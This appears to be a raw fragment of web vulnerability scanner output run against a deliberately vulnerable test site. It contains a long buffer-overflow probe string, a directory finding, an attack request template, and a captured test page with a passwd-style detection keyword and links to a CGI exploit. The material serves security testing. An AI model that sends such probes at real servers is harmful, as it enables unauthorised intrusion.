aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">BufferOverflow Link</A>
</P> </BODY>
</HTML>Directory (testing)<B>Found Directory:</B> /testing/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing Apache - Access Control</A>
<BR><BR><B>IIS:</B><BR><A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS Standard Permissions on Your Web Site</A>
<BR> <BR><B>Netscape:</B><BR><A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR><B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /testing/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 74827
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Hidden Reference comment: should find this file /test/hidden.txt -->
<P> The first section shows how a combo box can be used to product optional
pages<BR></P>
<FORM ACTION="pcomboindex.asp" METHOD="post">
<SELECT NAME="cboPage">
<OPTION SELECTED="SELECTED" VALUE="pc1">Show Page One</OPTION>
<OPTION VALUE="pc2">Show Page Two</OPTION>
<OPTION VALUE="pc3">Show page three</OPTION>
</SELECT><BR> <INPUT TYPE="submit" VALUE="Submit"> </FORM><BR> <HR>
<P><A HREF="plink.asp?a=b&c=12">Second section is link that passes
parameters to a sub page</A><BR> <BR> <A HREF="error.html">My ERROR</A> Third
example allows the user to input values and then shows them on the following
page</P> <BR> <HR>
<P>False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <BR>
False Keyword that should not be flagged: An error has occurred <BR> <BR> <BR>
<A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by
SmartChecker</A> <BR> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit
- Should not be flagged due to not having keyword present</A> <BR>
<A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged
by Smartchecker(Note: No HTML present)</A> <BR> <A
HREF="/linking/index.htm">Several chained directories</A> <BR>
<A HREF="/cfmerror.html">Cold Fusion Error</A> <BR> <A
HREF="/admin/help.cgi">Help</A> <BR> <A HREF="/aspnet.aspx">ASP.NET file</A>
<A HREF="/my folder/bleh.html">space folder</A>
<A HREF='/myquote.asp?bleh=''>quote link</A>
